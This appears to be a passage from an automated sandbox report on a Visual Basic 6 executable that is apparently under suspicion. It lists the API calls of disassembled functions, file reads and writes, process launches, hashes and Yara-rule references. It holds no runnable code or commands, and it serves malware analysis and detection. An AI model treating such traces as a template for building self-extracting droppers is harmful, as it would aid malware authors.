Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 004082F3
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00408300
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408310
__vbaStrCopy.MSVBVM60 ref: 00408328

Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E

__vbaStrMove.MSVBVM60(?,00000000), ref: 00408343
__vbaStrCat.MSVBVM60(00000000), ref: 0040834A
__vbaStrMove.MSVBVM60 ref: 00408355
__vbaStrCopy.MSVBVM60 ref: 00408362
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408376
__vbaStrCopy.MSVBVM60 ref: 0040838E
__vbaStrMove.MSVBVM60(?,00000000), ref: 004083A8
__vbaStrCat.MSVBVM60(00000000), ref: 004083AF
__vbaStrMove.MSVBVM60 ref: 004083BA
__vbaStrCopy.MSVBVM60 ref: 004083C7
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004083DB
__vbaStrCopy.MSVBVM60 ref: 004083F3
__vbaStrMove.MSVBVM60(?), ref: 00408407
__vbaStrCopy.MSVBVM60 ref: 00408414
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408424
__vbaStrCopy.MSVBVM60 ref: 0040843C
__vbaStrMove.MSVBVM60(?,00000000), ref: 00408457
__vbaStrCat.MSVBVM60(00000000), ref: 0040845E
__vbaStrMove.MSVBVM60 ref: 00408469
__vbaStrCopy.MSVBVM60 ref: 00408476
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040848A
__vbaStrCopy.MSVBVM60 ref: 004084A2
__vbaStrMove.MSVBVM60(?,00000000), ref: 004084BD
__vbaStrCat.MSVBVM60(00000000), ref: 004084C4
__vbaStrMove.MSVBVM60 ref: 004084CF
__vbaStrCopy.MSVBVM60 ref: 004084DC
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004084F0
__vbaStrCopy.MSVBVM60 ref: 00408508
__vbaStrMove.MSVBVM60(?), ref: 0040851C
__vbaStrCopy.MSVBVM60 ref: 00408529
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408539
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408556
__vbaStrMove.MSVBVM60 ref: 00408561
__vbaStrCat.MSVBVM60(004057CC,00000000), ref: 0040856D
__vbaStrMove.MSVBVM60 ref: 00408578
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408586
__vbaStrMove.MSVBVM60 ref: 00408591
#517.MSVBVM60(00000000), ref: 00408598
__vbaStrMove.MSVBVM60 ref: 004085A3
__vbaStrCopy.MSVBVM60 ref: 004085B0
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004085C8
__vbaStrCopy.MSVBVM60 ref: 004085E0
__vbaStrMove.MSVBVM60(?), ref: 004085F4
__vbaStrCopy.MSVBVM60 ref: 00408601
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408611
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040862F
__vbaStrMove.MSVBVM60 ref: 0040863A
__vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00408646
__vbaStrMove.MSVBVM60 ref: 00408651
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040865E
__vbaStrMove.MSVBVM60 ref: 00408669
#517.MSVBVM60(00000000), ref: 00408670
__vbaStrMove.MSVBVM60 ref: 0040867B
__vbaStrCopy.MSVBVM60 ref: 00408688
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 004086A0
__vbaStrCopy.MSVBVM60 ref: 004086B8
__vbaStrMove.MSVBVM60(?,00000000), ref: 004086D3
__vbaStrCat.MSVBVM60(00000000), ref: 004086DA
__vbaStrMove.MSVBVM60 ref: 004086E5
__vbaStrCopy.MSVBVM60 ref: 004086F2
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408706
__vbaStrCopy.MSVBVM60 ref: 0040871E
__vbaStrMove.MSVBVM60(?,00000000), ref: 00408739
__vbaStrCat.MSVBVM60(00000000), ref: 00408740
__vbaStrMove.MSVBVM60 ref: 0040874B
#517.MSVBVM60(00000000), ref: 00408752
__vbaStrMove.MSVBVM60 ref: 0040875D
__vbaStrCopy.MSVBVM60 ref: 0040876A
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408782
__vbaStrCopy.MSVBVM60 ref: 0040879A
__vbaStrMove.MSVBVM60(?), ref: 004087AE
__vbaStrCopy.MSVBVM60 ref: 004087BB
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004087CB

Part of subcall function 004125A0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004087E7,00000000), ref: 004125BE
Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004125EB
Part of subcall function 004125A0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004125FA
Part of subcall function 004125A0: #648.MSVBVM60(0000000A), ref: 00412619
Part of subcall function 004125A0: __vbaFreeVar.MSVBVM60 ref: 00412628
Part of subcall function 004125A0: __vbaI2I4.MSVBVM60(?), ref: 0041263C
Part of subcall function 004125A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041264A
Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 0041265A
Part of subcall function 004125A0: #570.MSVBVM60(00000000), ref: 00412661
Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 0041266E
Part of subcall function 004125A0: __vbaLenBstr.MSVBVM60(00404B24), ref: 004126A5
Part of subcall function 004125A0: #525.MSVBVM60(00000000), ref: 004126AC
Part of subcall function 004125A0: __vbaStrMove.MSVBVM60 ref: 004126B7
Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126C7
Part of subcall function 004125A0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004126D2
Part of subcall function 004125A0: __vbaI2I4.MSVBVM60 ref: 004126E2
Part of subcall function 004125A0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004126EF
Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(?), ref: 0041270A
Part of subcall function 004125A0: __vbaStrCopy.MSVBVM60 ref: 00412728
Part of subcall function 004125A0: __vbaStrMove.MSVBVM60(00000003), ref: 00412739
Part of subcall function 004125A0: #616.MSVBVM60(00000000), ref: 00412740

__vbaOnError.MSVBVM60(000000FF,00000000), ref: 004087F5
#669.MSVBVM60 ref: 00408802
__vbaStrMove.MSVBVM60 ref: 0040880D
__vbaStrCopy.MSVBVM60 ref: 0040881A
__vbaFreeStr.MSVBVM60 ref: 00408823
__vbaStrCopy.MSVBVM60 ref: 0040883C
__vbaStrCmp.MSVBVM60(00405B3C,?), ref: 00408855
__vbaEnd.MSVBVM60(80000002,00000000,00000000,00000000,80000002,00000000,00000000,00000000), ref: 004088B0
__vbaStrCmp.MSVBVM60(00405E88,?), ref: 004088CE
#580.MSVBVM60(00000000,00000027,00000000,00000000,0041B078,00000000), ref: 00408931
#600.MSVBVM60(00004008,00000000,00000000), ref: 0040895B
__vbaEnd.MSVBVM60 ref: 0040896E
__vbaStrCopy.MSVBVM60 ref: 00408A41
__vbaStrMove.MSVBVM60(?,00000000), ref: 00408A5B
__vbaStrCat.MSVBVM60(00000000), ref: 00408A62
__vbaStrMove.MSVBVM60 ref: 00408A6D
__vbaStrCopy.MSVBVM60 ref: 00408A7A
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00408A8E
__vbaStrCopy.MSVBVM60 ref: 00408AA6
__vbaStrMove.MSVBVM60(?,00000000), ref: 00408AC1
__vbaStrCat.MSVBVM60(00000000), ref: 00408AC8
__vbaStrMove.MSVBVM60 ref: 00408AD3
#517.MSVBVM60(00000000), ref: 00408ADA
__vbaStrMove.MSVBVM60 ref: 00408AE5
__vbaStrCopy.MSVBVM60 ref: 00408AF2

Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7

__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00408B0A
__vbaStrCopy.MSVBVM60 ref: 00408B22
__vbaStrMove.MSVBVM60(?), ref: 00408B36
__vbaStrCopy.MSVBVM60 ref: 00408B43
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B53
__vbaStrCopy.MSVBVM60 ref: 00408B6B
__vbaStrMove.MSVBVM60(?), ref: 00408B7F
__vbaStrCopy.MSVBVM60 ref: 00408B8C
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408B9C
__vbaStrCopy.MSVBVM60 ref: 00408BB4
__vbaStrMove.MSVBVM60(?), ref: 00408BC8
__vbaStrCopy.MSVBVM60 ref: 00408BD5
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408BE5
__vbaStrCopy.MSVBVM60 ref: 00408BFD
__vbaStrMove.MSVBVM60(?), ref: 00408C11
__vbaStrCopy.MSVBVM60 ref: 00408C1E
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C2E
__vbaStrCopy.MSVBVM60 ref: 00408C46

Strings

MGH+$2, xrefs: 00408320
;, xrefs: 00408C37

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Copy$Free$List$CheckHresult$ErrorNew2$#517$Bstr$#516#631AnsiChkstkSystemUnicode$File$#525#537#570#580#600#616#618#648#669Get3OpenSeek
String ID: ;$MGH+$2
API String ID: 2419524798-2363849171
Opcode ID: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
Instruction ID: 93bf0c189370be62b4749cd89f90093835801c62d3816994bc11815577fef7f0
Opcode Fuzzy Hash: 4922fd86914f0d1911d26fd6260cb31160d45723a23d8febec2101ce13e3e991
Instruction Fuzzy Hash: 59B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59

Function 00411590 Relevance: 161.5, APIs: 91, Strings: 1, Instructions: 456COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409C6C,00000000,00000000), ref: 004115AE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115DB
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115E7
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004115F3
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00411602
#648.MSVBVM60(0000000A), ref: 00411621
__vbaFreeVar.MSVBVM60 ref: 00411630
__vbaI2I4.MSVBVM60(?), ref: 00411644
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00411652
__vbaI2I4.MSVBVM60 ref: 00411662
#570.MSVBVM60(00000000), ref: 00411669
__vbaLenBstr.MSVBVM60(00404B24), ref: 00411676
__vbaLenBstr.MSVBVM60(00404B24), ref: 004116AD
#525.MSVBVM60(00000000), ref: 004116B4
__vbaStrMove.MSVBVM60 ref: 004116BF
__vbaI2I4.MSVBVM60 ref: 004116CF
__vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004116DA
__vbaI2I4.MSVBVM60 ref: 004116EA
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004116F7
__vbaStrCopy.MSVBVM60 ref: 0041170C

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?), ref: 00411720

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrMove.MSVBVM60(?,00000000), ref: 00411735
__vbaStrCmp.MSVBVM60(00000000), ref: 0041173C
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041175E
__vbaI2I4.MSVBVM60(?,?,00000000,004025E6), ref: 0041178B
__vbaFileClose.MSVBVM60(00000000,?,?,00000000,004025E6), ref: 00411792
__vbaI2I4.MSVBVM60 ref: 004117A9
__vbaFileClose.MSVBVM60(00000000), ref: 004117B0
__vbaI2I4.MSVBVM60 ref: 004117DB
__vbaFileSeek.MSVBVM60(?,00000000), ref: 004117E6
__vbaI2I4.MSVBVM60 ref: 004117F6
__vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00411803
__vbaI2I4.MSVBVM60 ref: 00411832
__vbaFileSeek.MSVBVM60(00000001,00000000), ref: 0041183B

Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38

#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041186A
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411879
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041188D
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041189B
#525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118AD
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004118B8
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411911
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041191E
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041192E
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041193B
#525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411979
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411984
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411994
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119A1
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119B1
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119BE
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E0
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004119E7
#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A16
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A25
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A39
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A47
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A57
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A5E
#580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A71
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A85
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A93
#525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AA5
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AB0
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B09
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B16
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B26
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B33
#525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B71
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B7C
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B8C
__vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B99
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BA9
__vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BB6
#598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BD0
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BEC
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BFC
__vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C03
__vbaStrCat.MSVBVM60(00406BF8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C19
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C24
__vbaStrCat.MSVBVM60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C31
#600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C47
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C56
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C5F
#600.MSVBVM60(00004008,00000000), ref: 00411C85
__vbaFreeStr.MSVBVM60(00411CE8), ref: 00411CBD
__vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CC6
__vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CCF
__vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CD8
__vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CE1
__vbaErrorOverflow.MSVBVM60 ref: 00411CFF

Strings

E, xrefs: 00411C65

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
String ID: E
API String ID: 1020712489-3568589458
Opcode ID: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
Opcode Fuzzy Hash: dd04ee743c3aedb4f20eed2c2bd3a439915ce7c229051d87dfabd16d575bf736
Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58

Function 00408D7C Relevance: 129.9, APIs: 73, Strings: 1, Instructions: 397COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
__vbaStrMove.MSVBVM60 ref: 00408DC0
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
__vbaStrMove.MSVBVM60 ref: 00408DD9
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
__vbaStrMove.MSVBVM60 ref: 00408DF0
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
__vbaStrMove.MSVBVM60 ref: 00408E08
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
__vbaStrMove.MSVBVM60 ref: 00408E21
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
__vbaStrMove.MSVBVM60 ref: 00408E38
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
__vbaStrMove.MSVBVM60 ref: 00408E51
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
__vbaStrMove.MSVBVM60 ref: 00408E69
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
__vbaStrMove.MSVBVM60 ref: 00408E80

Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338

__vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
__vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
__vbaStrMove.MSVBVM60 ref: 00408ED9
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
__vbaStrMove.MSVBVM60 ref: 00408EF2
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
__vbaStrMove.MSVBVM60 ref: 00408F09
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
__vbaStrMove.MSVBVM60 ref: 00408F21
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
__vbaStrMove.MSVBVM60 ref: 00408F3A
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
__vbaStrMove.MSVBVM60 ref: 00408F51
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
__vbaStrMove.MSVBVM60 ref: 00408F6A
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
__vbaStrMove.MSVBVM60 ref: 00408F82
__vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
__vbaStrMove.MSVBVM60 ref: 00408F99

Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
